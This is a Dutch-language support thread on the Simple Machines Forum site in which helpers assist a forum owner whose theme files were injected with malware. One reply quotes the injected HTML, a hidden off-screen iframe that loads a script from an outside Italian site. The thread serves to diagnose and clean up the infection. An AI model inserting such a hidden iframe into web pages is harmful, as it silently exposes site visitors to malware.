News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

Forum gehacked?

Started by usa4all, September 07, 2013, 07:56:02 AM

Previous topic - Next topic

usa4all

HELP! Ik ben bang dat mijn forum is gehacked..

Mijn virusscanner (TrendMicro) geeft een melding van een (Italiaanse) website bij het openen van het forum (http://forum.verenigdestaten.info) het lettertype is een stuk groter terwijl de scherminstellingen op 100% staan.  Op de IPAD is het forum opeens maar enkele centimeters breed.

Ik heb zojuist het forum geüpgraded naar de laatste versie en alle wachtwoorden gewijzigd. Echter ik ben er niet van overtuigd dat het probleem is opgelost. Sterker nog Google chrome geeft de melding malware gedetecteerd.

Dus nogmaals: HELP....

Ps. alles ondefinieerbare files directory's voor de upgrade verwijderd..

LiroyvH

Er lijkt inderdaad malware in je forum te zitten.
in Themes/ProRed/scripts/theme.js?fin20 (Wss theme.js vanaf regel 20)

Zit een behoorlijk troepje in.
http://sitecheck.sucuri.net/results/forum.verenigdestaten.info/
((U + C + I)x(10 − S)) / 20xAx1 / (1 − sin(F / 10))
President/CEO of Simple Machines - Server Manager
Please do not PM for support - anything else is usually OK.

usa4all

Ha,..

Tx!  Nu ik weet waar het zit, kan ik gericht actie ondernemen...

Wordt vervolgd..

NanoSector

Ook even je index.template.php controleren (Themes/(thema)), zag dit in je HTML:
<p id="eo" class="eo09"><iframe style="position: absolute; color: rgb(0, 55, 80); height: 3750px; width: 3750px; left: 1.00038e+7px; top: 1.00038e+7px;" src="http://www.dedoniturismo.it/cnt.php"></iframe></p>
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

usa4all

Ik denk dat ik alles maar ga overschrijven met de originele files... Kan dat zonder meer , zonder problemen?

NanoSector

Nou, het probleem is dan dat je een custom thema gebruikt. Met het default thema zal alles werken maar omdat je mods gebruikt/gebruikte zal het custom thema breken en fouten geven (waar omheen gewerkt kan worden).

Attach anders eens je index.template.php hier, dan kijk ik er wel even naar. De code ziet er niet uit zoals het eruit zou moeten zien hier (definities van CSS bestanden zijn naar <body> verschoven terwijl ze in <head> moeten staan etc.)
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

usa4all

Quote from: Yoshi on September 07, 2013, 10:35:44 AM
Ook even je index.template.php controleren (Themes/(thema)), zag dit in je HTML:
<p id="eo" class="eo09"><iframe style="position: absolute; color: rgb(0, 55, 80); height: 3750px; width: 3750px; left: 1.00038e+7px; top: 1.00038e+7px;" src="http://www.dedoniturismo.it/cnt.php"></iframe></p>

Tx.. Ik heb het gevonden... In de php files zijn het combinaties van letters en tekens, dus geen plain tekst..  Zoekt wat lastiger,.. 

NanoSector

Zou je dan toch even het bestand aan een post willen hangen? Ik maak me zorgen om hoe het eruit ziet, aangezien weinig van je HTML klopt.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

usa4all

Hierbij de huidige index template
Ik heb al het eea andere er uit gegooid..

NanoSector

Ziet er verder goed uit :)
Code lijkt ook weg van de site zelf, so you're good to go.
Net ook even met Sucuri gescant en dat lijkt ook goed te zitten. Wel is je site geblacklist door wat services (o.a. Google) dus daar zou je actie op kunnen ondernemen.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

usa4all

Bedankt voor je hulp...

Echter als ik nu scan dan krijg ik nog wel wat meldingen.. (Zie afbeelding)

Dus ws zit het toch nog niet helemaal lekker?

NanoSector

Dat is een gecachte scan, klik onderop maar eens op rescan :)
Hij is trouwens alleen geblacklist bij Opera. Dus dat scheelt, moet je ze misschien een mailtje sturen van god hee we hadden wat malware op onze site maar dit is nu opgelost. Wel even de Sucuri check bijvoegen.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

usa4all

Ik zie het!

Top!

Hij zegt dat ik alleen bij Opera (AVG) ben geblacklisted. (Jij noemt o.a. Google)   Hoe krijg ik dat er uit?

Als ik bij Google webmaster tools kijk , zie ik geen foutmeldingen..

NanoSector

Bij Google niet nee, was het eerste wat in me op kwam ;)

Als het AVG is dan is het een kwestie van tijd totdat dat weer goed komt. Geef het een weekje, als het dan nog niet is opgelost kun je alsnog een reactie hier posten, dan zal ik het verder met je uitwerken, oke? :)
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

usa4all

Quote from: Yoshi on September 07, 2013, 11:59:31 AM
Bij Google niet nee, was het eerste wat in me op kwam ;)

Als het AVG is dan is het een kwestie van tijd totdat dat weer goed komt. Geef het een weekje, als het dan nog niet is opgelost kun je alsnog een reactie hier posten, dan zal ik het verder met je uitwerken, oke? :)

Ok , top!

Tx..

LiroyvH

Het valt ook aan te raden even goed je logs door te nemen (op de server, niet van het forum) om te kijken hoe men dit voor elkaar gespeeld heeft.
Let op dat het niet perse, en waarschijnlijk ook niet gezien er geen beveiligingslekken bekend zijn, in het forum hoeft te zitten maar ook iets anders binnen je webhosting pakket kan zijn. Let dus goed op!
((U + C + I)x(10 − S)) / 20xAx1 / (1 − sin(F / 10))
President/CEO of Simple Machines - Server Manager
Please do not PM for support - anything else is usually OK.

usa4all

Ik heb van de volledige server alle wachtwoorden gewijzigd (root/ftp/web) , maar laat de logs inderdaad ff nakijken!

Advertisement: